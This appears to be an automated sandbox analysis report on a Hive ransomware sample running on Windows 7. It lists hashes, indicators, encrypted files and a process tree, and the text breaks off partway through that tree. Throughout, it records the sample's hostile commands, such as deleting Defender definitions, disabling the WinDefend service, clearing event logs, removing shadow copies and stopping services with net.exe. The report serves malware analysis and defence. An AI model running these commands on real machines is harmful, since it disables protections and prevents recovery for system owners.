Analysis
-
max time kernel
145s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
22/11/2021, 12:00
Static task
static1
Behavioral task
behavioral1
Sample
f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe
Resource
win10-en-20211104
General
-
Target
f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe
-
Size
3.5MB
-
MD5
a9007a089fc314fda26806fb420cd78d
-
SHA1
ab3530b512cb96897bbcb8b8e3a9ff4b534c2e06
-
SHA256
f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16
-
SHA512
c2acd3d696891c9aaad61f1ae5a82aeb282289919ec9a713648720593b1bce79da43bdba1430437b5782a4f1d74f06b1ab44fd9562b22ce24163dadc970587fa
Malware Config
Extracted
C:\Program Files\7-Zip\p3qn_HOW_TO_DECRYPT.txt
hive
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 432 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 952 bcdedit.exe 1472 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_4HSCpBHQN2g0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_VyyCuP6rh9k0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InputPersonalization.exe.mui f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_rakHDYfkmkg0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_EBV_qraH5Sg0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_HV4JDlRoRaA0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_xvc517JOByE0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_sp30CkVVL6c0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00629_.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_yjIDhslAhUE0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21297_.GIF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_ryRm3xjoUiM0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_cn78zsEa4fM0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_AZep27FK4U00.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmpnssui.dll.mui f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_lpxgWAf_26c0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Grid.eftx.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_rz9Kocw7o3s0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_qLtuadfolww0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1F.GIF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_lF0LP-QI9Ds0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\LightSpirit.css.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_EDrtbIE_w1Y0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_EEA2yUHeLug0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_E4UdBvtqwzM0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\p3qn_HOW_TO_DECRYPT.txt f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Internet Explorer\Timeline.cpu.xml f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_rexo-odk2480.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_n3VTBO2kEg40.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Process Library.fdt.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_1lZESvdi_Cg0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_zLd4xcFsrLo0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_viBBydjWgJU0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_07.MID.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_Fb2xQPJeZhg0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3B.BDR.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_siA8k_yEmEo0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_jDpFRWacPq40.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0252669.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_H04RhWq8lIg0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_Pi2pifAceS00.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\mip.exe.mui f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_Mq8I-aoW__s0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_uyV0CZmR_3U0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_35L86k6JopI0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseover.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Newsprint.eftx.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_T5Q5tZRO_Ds0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_U3SkB45cSGU0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NBOOK_01.MID.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_Ufe4dvnl4FE0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01044_.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_g2Voox2kYtQ0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_N0s8YBWRWic0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_EgIxeoD3uDQ0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_1pQZvyq2nyw0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePage.gif.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_2MO2jdZqxsY0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right_over.gif.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_QdwQ2Rnj8P00.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_alignright.gif.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_kBk7wxdq20s0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\p3qn_HOW_TO_DECRYPT.txt f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\7-Zip\descript.ion.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_gWiYmV2MYw00.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_9v7VJgFye4E0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_kz5mCfezkkM0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Common Files\System\ja-JP\wab32res.dll.mui f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\DEEPBLUE\DEEPBLUE.INF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_lz6Cnrz0cDs0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\SLATE.ELM.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_UFcCWlsGNGc0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.QN5RCcIsU1EAnbuQqdcK4mBgztjlZTX1-rP0TWuwh_D_prHeUEPxSuI0.o4kjj f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\css\settings.css f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1444 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2076 powershell.exe 2164 powershell.exe 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1468 wevtutil.exe Token: SeBackupPrivilege 1468 wevtutil.exe Token: SeSecurityPrivilege 2040 wevtutil.exe Token: SeBackupPrivilege 2040 wevtutil.exe Token: SeSecurityPrivilege 1600 wevtutil.exe Token: SeBackupPrivilege 1600 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1624 wmic.exe Token: SeSecurityPrivilege 1624 wmic.exe Token: SeTakeOwnershipPrivilege 1624 wmic.exe Token: SeLoadDriverPrivilege 1624 wmic.exe Token: SeSystemProfilePrivilege 1624 wmic.exe Token: SeSystemtimePrivilege 1624 wmic.exe Token: SeProfSingleProcessPrivilege 1624 wmic.exe Token: SeIncBasePriorityPrivilege 1624 wmic.exe Token: SeCreatePagefilePrivilege 1624 wmic.exe Token: SeBackupPrivilege 1624 wmic.exe Token: SeRestorePrivilege 1624 wmic.exe Token: SeShutdownPrivilege 1624 wmic.exe Token: SeDebugPrivilege 1624 wmic.exe Token: SeSystemEnvironmentPrivilege 1624 wmic.exe Token: SeRemoteShutdownPrivilege 1624 wmic.exe Token: SeUndockPrivilege 1624 wmic.exe Token: SeManageVolumePrivilege 1624 wmic.exe Token: 33 1624 wmic.exe Token: 34 1624 wmic.exe Token: 35 1624 wmic.exe Token: SeIncreaseQuotaPrivilege 1184 wmic.exe Token: SeSecurityPrivilege 1184 wmic.exe Token: SeTakeOwnershipPrivilege 1184 wmic.exe Token: SeLoadDriverPrivilege 1184 wmic.exe Token: SeSystemProfilePrivilege 1184 wmic.exe Token: SeSystemtimePrivilege 1184 wmic.exe Token: SeProfSingleProcessPrivilege 1184 wmic.exe Token: SeIncBasePriorityPrivilege 1184 wmic.exe Token: SeCreatePagefilePrivilege 1184 wmic.exe Token: SeBackupPrivilege 1184 wmic.exe Token: SeRestorePrivilege 1184 wmic.exe Token: SeShutdownPrivilege 1184 wmic.exe Token: SeDebugPrivilege 1184 wmic.exe Token: SeSystemEnvironmentPrivilege 1184 wmic.exe Token: SeRemoteShutdownPrivilege 1184 wmic.exe Token: SeUndockPrivilege 1184 wmic.exe Token: SeManageVolumePrivilege 1184 wmic.exe Token: 33 1184 wmic.exe Token: 34 1184 wmic.exe Token: 35 1184 wmic.exe Token: SeIncreaseQuotaPrivilege 1184 wmic.exe Token: SeSecurityPrivilege 1184 wmic.exe Token: SeTakeOwnershipPrivilege 1184 wmic.exe Token: SeLoadDriverPrivilege 1184 wmic.exe Token: SeSystemProfilePrivilege 1184 wmic.exe Token: SeSystemtimePrivilege 1184 wmic.exe Token: SeProfSingleProcessPrivilege 1184 wmic.exe Token: SeIncBasePriorityPrivilege 1184 wmic.exe Token: SeCreatePagefilePrivilege 1184 wmic.exe Token: SeBackupPrivilege 1184 wmic.exe Token: SeRestorePrivilege 1184 wmic.exe Token: SeShutdownPrivilege 1184 wmic.exe Token: SeDebugPrivilege 1184 wmic.exe Token: SeSystemEnvironmentPrivilege 1184 wmic.exe Token: SeRemoteShutdownPrivilege 1184 wmic.exe Token: SeUndockPrivilege 1184 wmic.exe Token: SeManageVolumePrivilege 1184 wmic.exe Token: 33 1184 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 676 wrote to memory of 572 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 29 PID 676 wrote to memory of 572 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 29 PID 676 wrote to memory of 572 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 29 PID 572 wrote to memory of 1288 572 net.exe 31 PID 572 wrote to memory of 1288 572 net.exe 31 PID 572 wrote to memory of 1288 572 net.exe 31 PID 676 wrote to memory of 288 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 32 PID 676 wrote to memory of 288 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 32 PID 676 wrote to memory of 288 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 32 PID 288 wrote to memory of 1516 288 net.exe 34 PID 288 wrote to memory of 1516 288 net.exe 34 PID 288 wrote to memory of 1516 288 net.exe 34 PID 676 wrote to memory of 2016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 35 PID 676 wrote to memory of 2016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 35 PID 676 wrote to memory of 2016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 35 PID 2016 wrote to memory of 1820 2016 net.exe 37 PID 2016 wrote to memory of 1820 2016 net.exe 37 PID 2016 wrote to memory of 1820 2016 net.exe 37 PID 676 wrote to memory of 1076 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 38 PID 676 wrote to memory of 1076 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 38 PID 676 wrote to memory of 1076 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 38 PID 1076 wrote to memory of 1048 1076 net.exe 40 PID 1076 wrote to memory of 1048 1076 net.exe 40 PID 1076 wrote to memory of 1048 1076 net.exe 40 PID 676 wrote to memory of 1064 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 41 PID 676 wrote to memory of 1064 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 41 PID 676 wrote to memory of 1064 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 41 PID 1064 wrote to memory of 1860 1064 net.exe 43 PID 1064 wrote to memory of 1860 1064 net.exe 43 PID 1064 wrote to memory of 1860 1064 net.exe 43 PID 676 wrote to memory of 1928 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 44 PID 676 wrote to memory of 1928 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 44 PID 676 wrote to memory of 1928 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 44 PID 1928 wrote to memory of 1468 1928 net.exe 46 PID 1928 wrote to memory of 1468 1928 net.exe 46 PID 1928 wrote to memory of 1468 1928 net.exe 46 PID 676 wrote to memory of 1284 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 47 PID 676 wrote to memory of 1284 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 47 PID 676 wrote to memory of 1284 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 47 PID 1284 wrote to memory of 996 1284 net.exe 49 PID 1284 wrote to memory of 996 1284 net.exe 49 PID 1284 wrote to memory of 996 1284 net.exe 49 PID 676 wrote to memory of 684 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 50 PID 676 wrote to memory of 684 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 50 PID 676 wrote to memory of 684 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 50 PID 684 wrote to memory of 1728 684 net.exe 52 PID 684 wrote to memory of 1728 684 net.exe 52 PID 684 wrote to memory of 1728 684 net.exe 52 PID 676 wrote to memory of 1260 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 53 PID 676 wrote to memory of 1260 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 53 PID 676 wrote to memory of 1260 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 53 PID 676 wrote to memory of 1452 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 55 PID 676 wrote to memory of 1452 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 55 PID 676 wrote to memory of 1452 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 55 PID 676 wrote to memory of 1188 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 57 PID 676 wrote to memory of 1188 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 57 PID 676 wrote to memory of 1188 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 57 PID 676 wrote to memory of 1016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 59 PID 676 wrote to memory of 1016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 59 PID 676 wrote to memory of 1016 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 59 PID 676 wrote to memory of 2036 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 61 PID 676 wrote to memory of 2036 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 61 PID 676 wrote to memory of 2036 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 61 PID 676 wrote to memory of 1568 676 f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe 63
Processes
-
C:\Users\Admin\AppData\Local\Temp\f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe"C:\Users\Admin\AppData\Local\Temp\f771389e1e67994756c3dc36278c52996b8798455fbcbb949faff3463a77dc16.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1288
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:288 -
